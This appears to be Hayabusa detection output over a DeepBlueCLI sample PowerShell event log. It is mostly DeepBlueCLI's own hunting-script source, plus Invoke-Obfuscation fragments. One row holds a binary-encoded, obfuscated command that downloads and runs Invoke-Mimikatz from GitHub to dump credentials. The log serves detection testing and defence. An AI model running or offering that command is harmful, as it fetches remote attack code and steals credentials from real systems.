$output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" $hash=$eventXML.Event.EventData.Data[5].""#text"" $pscommand= "" - Image: "" + $image + ""`r`n"" $pscommand+= "" - ImageLoaded: "" + $imageload + ""`r`n"" #$pscommand+= "" - Hash: "" + $hash + ""`r`n"" # Multiple hashes may be logged, we want SHA1. Remove everything through ""SHA1="" $sha1= $hash -Replace ""(?ms)^.*SHA1="","""" # Split the string on commas, grab field 0 $sha1=$sha1.Split("","")[0] $hashfile="".\hashes\$sha1"" if (-not (Test-Path $hashfile)){ # Hash file doesn't exist, create it $csv=$image+"",""+$imageload $csv | Set-Content $hashfile } #$pscommand+= $eventXML.Event.EventData.Data[6].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[7].""#text"" + ""`r`n"" #$pscommand+= $eventXML.Event.EventData.Data[8].""#text"" + ""`r`n"" $output+= "" Unsigned image:`r`n"" $output+= $pscommand } } } if ($output){ $event.TimeCreated $output """" } } if ($failedlogons -gt $maxfailedlogons){ ""High number of failed logons in the security event log: "" + $failedlogons } }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.272 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Options($file, $log) { $log_error=""Unknown and/or unsupported log type"" $logname="""" # Checks the command line options, return logname to parse if($file -eq """"){ # No filename provided, parse local logs if(($log -eq """") -or ($log -eq ""Security"")){ # Parse the security log if no log was selected $logname=""Security"" } ElseIf ($log -eq ""System""){ $logname=""System"" } ElseIf ($log -eq ""Application""){ $logname=""Application"" } ElseIf ($log -eq ""Sysmon""){ $logname=""Sysmon"" } ElseIf ($log -eq ""Powershell""){ $logname=""Powershell"" } Else{ write-host $log_error exit 1 } } else{ # Filename provided, check if it exists: if (Test-Path $file){ # File exists. Todo: verify it is an evtx file. # Get-WinEvent will generate this error for non-evtx files: ""...file does not appear to be a valid log file. # Specify only .evtx, .etl, or .evt filesas values of the Path parameter."" # # Check the LogName of the first event try{ $event=Get-WinEvent -path $file -max 1 -ErrorAction Stop } catch { Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } switch ($event.LogName){ ""Security"" {$logname=""Security""} ""System"" {$logname=""System""} ""Application"" {$logname=""Application""} ""Microsoft-Windows-AppLocker*"" {$logname=""Applocker""} ""Microsoft-Windows-PowerShell/Operational"" {$logname=""Powershell""} ""Microsoft-Windows-Sysmon/Operational"" {$logname=""Sysmon""} default {""Logic error 3, should not reach here..."";Exit 1} } } else{ # Filename does not exist, exit Write-host ""Error: no such file. Exiting..."" exit 1 } } return $logname }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:25:40.275 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Create-Filter($file, $logname) { # Return the Get-Winevent filter # $sys_events=""7030,7036,7045"" $sec_events=""4688,4720,4728,4732,4625"" $app_events=""2"" $applocker_events=""8003,8004,8006,8007"" $powershell_events=""4103,4104"" $sysmon_events=""1,7"" if ($file -ne """"){ switch ($logname){ ""Security"" {$filter=""@{path=""""$file"""";ID=$sec_events}""} ""System"" {$filter=""@{path=""""$file"""";ID=$sys_events}""} ""Application"" {$filter=""@{path=""""$file"""";ID=$app_events}""} ""Applocker"" {$filter=""@{path=""""$file"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{path=""""$file"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{path=""""$file"""";ID=$sysmon_events}""} default {""Logic error 1, should not reach here..."";Exit 1} } } else{ switch ($logname){ ""Security"" {$filter=""@{Logname=""""Security"""";ID=$sec_events}""} ""System"" {$filter=""@{Logname=""""System"""";ID=$sys_events}""} ""Application"" {$filter=""@{Logname=""""Application"""";ID=$app_events}""} ""Applocker"" {$filter=""@{logname=""""Microsoft-Windows-AppLocker"""";ID=$applocker_events}""} ""Powershell"" {$filter=""@{logname=""""Microsoft-Windows-PowerShell/Operational"""";ID=$powershell_events}""} ""Sysmon"" {$filter=""@{logname=""""Microsoft-Windows-Sysmon/Operational"""";ID=$sysmon_events}""} default {""Logic error 2, should not reach here..."";Exit 1} } } return $filter }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.659 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Command($commandline,$minlength,$regexes,$whitelist,$servicecmd){ $text="""" $base64="""" # Check to see if command is whitelisted foreach ($entry in $whitelist) { if ($commandline -Match $entry.regex) { # Command is whitelisted, return nothing return } } #$cmdlength=$commandline.length #if ($cmdlength -gt $minlength){ if ($commandline.length -gt $minlength){ $text += "" - Long Command Line: greater than $minlength bytes`n"" } $text += (Check-Obfu $commandline) $text += (Check-Regex $commandline $regexes 0) # Check for base64 encoded function, decode and print if found # This section is highly use case specific, other methods of base64 encoding and/or compressing may evade these checks if ($commandline -Match ""\-enc.*[A-Za-z0-9/+=]{100}""){ $base64= $commandline -Replace ""^.* \-Enc(odedCommand)? "","""" } ElseIf ($commandline -Match "":FromBase64String\(""){ $base64 = $commandline -Replace ""^.*:FromBase64String\(\'*"","""" $base64 = $base64 -Replace ""\'.*$"","""" } if ($base64){ if ($commandline -Match ""Compression.GzipStream.*Decompress""){ # Metasploit-style compressed and base64-encoded function. Uncompress it. $decoded=New-Object IO.MemoryStream(,[Convert]::FromBase64String($base64)) $uncompressed=(New-Object IO.StreamReader(((New-Object IO.Compression.GzipStream($decoded,[IO.Compression.CompressionMode]::Decompress))),[Text.Encoding]::ASCII)).ReadToEnd() $text += "" Decoded/decompressed Base64:"" + $uncompressed $text += "" - Base64-encoded and compressed function`n"" } else{ $decoded = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($base64)) $text += "" Decoded Base64:"" + $decoded + ""`n"" $text += "" - Base64-encoded function`n"" $text += (Check-Obfu $decoded) $text += (Check-Regex $decoded $regexes 0) #foreach ($regex in $regexes){ # if ($regex.Type -eq 0) { # Image Path match # if ($decoded -Match $regex.regex) { # $text += "" - "" + $regex.String + ""`n"" # } # } #} } } if ($text){ if ($servicecmd){ return "" Service File Name: $commandline`n"" + $text } Else{ return "" Command Line: $commandline`n"" + $text } } return """" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.659 +09:00,SEC511,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.660 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Obfu($string){ # Check how many special characters are in the command. Inspired by Invoke-Obfuscation: https://twitter.com/danielhbohannon/status/778268820242825216 # There are many ways to do this, including regex. Need a way that doesn't kill the CPU. This works, but isn't super concise. There is probably a # better way. # $obfutext="""" # Local variable for return output $maxchars=25 #$obfuchars = ""\+"", ""\'"", ""\}"", ""\{"" #foreach ($char in $obfuchars){ # # I tried to loop through the characters (as the two commented lines above show, but # hit problems of variable interpolation. I am probably making a simple mistake. # If you can get the above loop working, please email deepblue at backshore dot net. # I will repay in an adult beverage # # In the meantime, this is ugly, but works $string2 = $string -replace ""`'"" # Compare the length if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ' characters`n"" } $string2 = $string -replace ""`{"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars { characters`n"" } $string2 = $string -replace ""`}"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars } characters`n"" } $string2 = $string -replace "","" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars , characters`n"" } $string2 = $string -replace ""!"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars ! characters`n"" } $string2 = $string -replace ""%"" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars & characters`n"" } $string2 = $string -replace ""`"""" if (($string.length - $string2.length) -gt $maxchars){ $obfutext += "" - Possible command obfuscation: greater than $maxchars double quotes`n"" } return $obfutext #} }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:04.661 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"function Check-Regex($string,$regexes,$type){ $regextext="""" # Local variable for return output foreach ($regex in $regexes){ if ($regex.Type -eq $type) { # Type is 0 for Commands, 1 for services. Set in regexes.csv if ($string -Match $regex.regex) { $regextext += "" - "" + $regex.String + ""`n"" } } } return $regextext }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:27:09.364 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:52.559 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$UpperLowerChar = $_; If(((Get-Random -Input @(1..2))-1 -eq 0)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $RandomDelimiters += $UpperLowerChar},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:52.574 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{$DelimitedEncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + (Get-Random -Input $RandomDelimiters))}",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.960 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.968 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.973 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.976 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.978 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.981 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:53.991 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:54.000 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:54.036 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:54.050 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ # Encapsulate current item with single quote if it contains a non-integer. If([Convert]::ToString(([Int][Char]$_),$EncodingBase).Trim('0123456789').Length -gt 0) {$Quote = ""'""} Else {$Quote = ''} $EncodedArray += ($Quote + [Convert]::ToString(([Int][Char]$_),$EncodingBase) + $Quote + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1))) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:56.644 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:56.651 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:55:56.696 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,{$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char},../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:09.115 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"-join('1001001n1000101-1011000g100000<101000e1001110F1100101-1110111@101101<1001111i1100010i1101010n1100101n1100011e1110100@100000-1001110n1100101n1110100n101110e1010111n1100101;1100010<1000011F1101100{1101001-1100101-1101110-1110100i101001<101110-1000100-1101111<1110111F1101110;1101100n1101111i1100001e1100100{1010011;1110100<1110010@1101001i1101110i1100111{101000e100111e1101000@1110100e1110100g1110000g1110011-111010-101111;101111;1110010@1100001@1110111-101110;1100111{1101001F1110100-1101000@1110101{1100010e1110101n1110011@1100101i1110010-1100011i1101111n1101110e1110100i1100101;1101110@1110100n101110i1100011<1101111n1101101-101111n1101101@1100001<1110100i1110100-1101001{1100110;1100101i1110011-1110100F1100001n1110100{1101001@1101111F1101110e101111-1010000<1101111e1110111{1100101e1110010;1010011i1110000n1101100@1101111F1101001e1110100i101111n1101101-1100001;1110011<1110100i1100101<1110010i101111<1000101;1111000;1100110-1101001-1101100<1110100;1110010F1100001<1110100{1101001@1101111n1101110i101111g1001001e1101110<1110110{1101111F1101011n1100101{101101@1001101-1101001{1101101i1101001n1101011n1100001-1110100;1111010<101110-1110000e1110011g110001e100111-101001;111011F100000@1001001{1101110g1110110{1101111i1101011F1100101-101101n1001101g1101001e1101101@1101001-1101011{1100001-1110100{1111010@100000g101101;1000100-1110101g1101101g1110000F1000011g1110010n1100101;1100100<1110011'.splIT( '<{genF-i;@' )| FOreAcH { ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) })| &( ([STRinG]$VerBosEPREfereNce)[1,3]+'x'-jOiN'')",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:09.116 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"{ ([coNvErt]::toInT16(([StriNG]$_) ,2 ) -AS [CHAR]) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:33.244 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.464 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,".\DeepBlue-0.3.ps1 """" powershell",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx 2017-08-31 03:56:34.470 +09:00,SEC511,4104,medium,,Potentially Malicious PwSh,"<# .SYNOPSIS A PowerShell module for hunt teaming via Windows event logs .DESCRIPTION DeepBlueCLI can automatically determine events that are typically triggered during a majority of successful breaches, including use of malicious command lines including PowerShell. .Example Process local Windows security event log: .\DeepBlue.ps1 .\DeepBlue.ps1 -log security .Example Process local Windows system event log: .\DeepBlue.ps1 -log system .\DeepBlue.ps1 """" system .Example Process evtx file: .\DeepBlue.ps1 .\evtx\new-user-security.evtx .\DeepBlue.ps1 -file .\evtx\new-user-security.evtx .LINK https://github.com/sans-blue-team/DeepBlueCLI #> # DeepBlueCLI 0.2 Beta # Eric Conrad, Backshore Communications, LLC # deepblue backshore net # Twitter: @eric_conrad # http://ericconrad.com # param ([string]$file=$env:file,[string]$log=$env:log) function Main { $text="""" # Temporary scratch pad variable to hold output text $minlength=1000 # Minimum length of command line to alert # Load cmd match regexes from csv file, ignore comments $regexes = Get-Content "".\regexes.txt"" | Select-String '^[^#]' | ConvertFrom-Csv # Load cmd whitelist regexes from csv file, ignore comments $whitelist = Get-Content "".\whitelist.txt"" | Select-String '^[^#]' | ConvertFrom-Csv $logname=Check-Options $file $log ""Processing the "" + $logname + "" log..."" $filter=Create-Filter $file $logname $failedlogons=0 # Count of failed logons (Security event 4625) $maxfailedlogons=100 # Alert after this many failed logons # Get the events: try{ $events = iex ""Get-WinEvent $filter -ErrorAction Stop"" } catch { Write-Host ""Get-WinEvent $filter -ErrorAction Stop"" Write-Host ""Get-WinEvent error: "" $_.Exception.Message ""`n"" Write-Host ""Exiting...`n"" exit } ForEach ($event in $events) { $output="""" # Final output text string $eventXML = [xml]$event.ToXml() if ($logname -eq ""Security""){ if ($event.id -eq 4688){ # A new process has been created. (Command Line Logging) $commandline=$eventXML.Event.EventData.Data[8].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } ElseIf ($event.id -eq 4720){ # A user account was created. $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[2].""#text"" $output += "" New user created: $username`n"" $output += "" - User SID: $securityid`n"" } ElseIf(($event.id -eq 4728) -or ($event.id -eq 4732)){ # A member was added to a security-enabled (global|local) group. $groupname=$eventXML.Event.EventData.Data[2].""#text"" # Check if group is Administrators, may later expand to all groups if ($groupname -eq ""Administrators""){ $username=$eventXML.Event.EventData.Data[0].""#text"" $securityid=$eventXML.Event.EventData.Data[1].""#text"" switch ($event.id){ 4728 {$output += "" User added to global $groupname group`n""} 4732 {$output += "" User added to local $groupname group`n""} } $output += "" - Username: $username`n"" $output += "" - User SID: $securityid`n"" } } ElseIf($event.id -eq 4625){ # An account failed to log on. # Requires auditing logon failures # https://technet.microsoft.com/en-us/library/cc976395.aspx $username=$eventXML.Event.EventData.Data[5].""#text"" $failedlogons += 1 } } ElseIf ($logname -eq ""System""){ if ($event.id -eq 7045){ # A service was installed in the system. $servicename=$eventXML.Event.EventData.Data[0].""#text"" # Check for suspicious service name $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" Service created, service name: $servicename`n"" $output += $text } # Check for suspicious cmd $commandline=$eventXML.Event.EventData.Data[1].""#text"" $output += (Check-Command $commandline $minlength $regexes $whitelist 1) } ElseIf ($event.id -eq 7030){ # The ... service is marked as an interactive service. However, the system is configured # to not allow interactive services. This service may not function properly. $servicename=$eventXML.Event.EventData.Data.""#text"" $output += "" Interactive service warning, service name: $servicename`n"" # Check for suspicious service name $output += (Check-Regex $servicename $regexes 1) } ElseIf ($event.id -eq 7036){ # The ... service entered the stopped|running state. $servicename=$eventXML.Event.EventData.Data[0].""#text"" $text = (Check-Regex $servicename $regexes 1) if ($text){ $output += "" "" + $event.Message + ""`n"" $output += $text } } } ElseIf ($logname -eq ""Application""){ if (($event.id -eq 2) -and ($event.Providername -eq ""EMET"")){ # EMET Block $output += "" EMET Block`n"" if ($event.Message){ # EMET Message is a blob of text that looks like this: ######################################################### # EMET detected HeapSpray mitigation and will close the application: iexplore.exe # # HeapSpray check failed: # Application : C:\Program Files (x86)\Internet Explorer\iexplore.exe # User Name : WIN-CV6AHH1BNU9\Instructor # Session ID : 1 # PID : 0xBA8 (2984) # TID : 0x9E8 (2536) # Module : mshtml.dll # Address : 0x6FBA7512, pull out relevant parts $array = $event.message -split '\n' # Split each line of the message into an array $message = $array[0] $application = Remove-Spaces($array[3]) $username = Remove-Spaces($array[4]) $output += "" - Message: $message`n"" $output += "" - $application`n"" $output += "" - $username`n"" } Else{ # If the message is blank: EMET is not installed locally. # This occurs when parsing remote event logs sent from systems with EMET installed $output += "" Warning: EMET Message field is blank. Install EMET locally to see full details of this alert"" } } } ElseIf ($logname -eq ""Applocker""){ if ($event.id -eq 8004){ # ...was prevented from running. $output += "" Applocker block: "" + $event.message } } ElseIf ($logname -eq ""PowerShell""){ #$event.pd if ($event.id -eq 4103){ $pscommand= $eventXML.Event.EventData.Data[2].""#text"" if ($pscommand -Match ""Host Application""){ # Multiline replace, remove everything before ""Host Application = "" $pscommand = $pscommand -Replace ""(?ms)^.*Host.Application = "","""" # Remove every line after the ""Host Application = "" line. $pscommand = $pscommand -Replace ""(?ms)`n.*$"","""" $output += (Check-Command $pscommand $minlength $regexes $whitelist 0) } } ElseIf ($event.id -eq 4104){ # This section requires PowerShell command logging, which is not the default with # event 4104 (logs the script block but not the command that launched it). # # Add the following to \Windows\System32\WindowsPowerShell\v1.0\profile.ps1 # $LogCommandHealthEvent = $true # $LogCommandLifecycleEvent = $true # # See the following for more information: # # https://logrhythm.com/blog/powershell-command-line-logging/ # http://hackerhurricane.blogspot.com/2014/11/i-powershell-logging-what-everyone.html # # Thank you: @heinzarelli and @HackerHurricane # # The command's path is $eventxml.Event.EventData.Data[4] # Blank path means it was run as a commandline. CLI parsing is *much* simpler than # script parsing. # This ignores scripts and grabs PowerShell CLIs if (-not ($eventxml.Event.EventData.Data[4].""#text"")){ $pscommand=$eventXML.Event.EventData.Data[2].""#text"" $output += (Check-Command $pscommand 500 $regexes $whitelist 0) } } } ElseIf ($logname -eq ""Sysmon""){ #@{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | %{$_.Properties[11].Value}| sort -Unique #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[11].Value}| Sort-Object -unique #Get-WinEvent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=7}|fl # Check command lines if ($event.id -eq 1){ #get-winevent @{logname=""Microsoft-Windows-Sysmon/Operational"";id=1} | % {$_.Properties[4].Value} $commandline=$eventXML.Event.EventData.Data[4].""#text"" # Remove ""Command Line: "" from the $commandline #$commandline= $commandline -Replace ""^Command Line:"","""" #$commandline $output += (Check-Command $commandline $minlength $regexes $whitelist 0) } # Check for unsigned EXEs/DLLs: ElseIf ($event.id -eq 7){ if ($eventXML.Event.EventData.Data[6].""#text"" -eq ""false""){ $image=$eventXML.Event.EventData.Data[3].""#text"" $imageload=$eventXML.Event.EventData.Data[4].""#text"" 